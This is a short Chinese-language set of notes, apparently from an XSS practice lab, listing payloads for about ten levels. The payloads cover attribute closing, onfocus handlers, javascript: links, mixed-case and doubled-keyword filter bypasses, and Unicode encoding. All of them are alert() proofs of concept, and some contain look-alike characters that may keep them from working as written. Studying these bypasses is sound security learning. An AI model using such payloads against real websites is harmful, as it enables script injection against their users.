第一关
第二关
1"> <script>alert(1)</script> <"1
1、无任何过滤
<script>alert()</script>
2、实体化 输入框没有
"> <script>alert()</script> <"
3、全部实体化 利用标签事件 单引号闭合
' οnfοcus=javascript:alert() '
4、全部实体化 利用标签事件 双引号闭合
" οnfοcus=javascript:alert() "
5、事件关键字过滤 利用其他标签调用 双引号闭合
"> <a href=javascript:alert()>xxx</a> <"
6、利用大小写未正则匹配
"> <sCript>alert()</sCript> <"
7、利用双写绕过匹配
"> <a hrehreff=javasscriptcript:alert()>x</a> <"
8、利用Unicode编码
javascript:alert()
9、利用Unicode编码(内容检测)
javascript:alert()('http://')
10、隐藏属性触发闭合
?t_sort=" οnfοcus=javascript:alert() type="text